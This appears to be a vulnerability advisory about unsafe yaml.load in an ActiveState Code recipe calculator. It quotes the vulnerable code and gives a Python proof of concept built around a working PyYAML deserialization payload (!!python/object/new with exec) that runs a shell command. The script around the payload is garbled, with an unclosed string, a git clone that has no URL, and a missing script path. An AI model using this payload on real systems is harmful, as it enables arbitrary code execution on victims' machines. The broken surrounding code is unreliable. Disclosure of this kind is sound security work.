vulnerability arbitrary code execution
severity 3.8
language python
registry other


Welcome to the ActiveState Code recipes repo! We have migrated all of the great content from to its new forever-home here at GitHub. This makes it easier for everyone to submit new recipes, contribute code and integrate all the great information into their own projects.

  • Vulnerability discription unsafe loading of data by the yaml.load function leading to Arbitrary code execution.

Proof of Concept

  • Vulnerable code part
def main(yml_food, yml_recipe):
    food = yaml.load(open(yml_food).read())
    recipe = yaml.load(open(yml_recipe).read())
  1. run
# this exploit is for simple recipe calculator in ActiveState/code repository
import os
os.system('git clone')
exploit = """!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
os.system('rm exp.yml')
os.system('python --yml-food=exp.yml --yml-recipe=exp.yml')
os.system('rm exp.yml')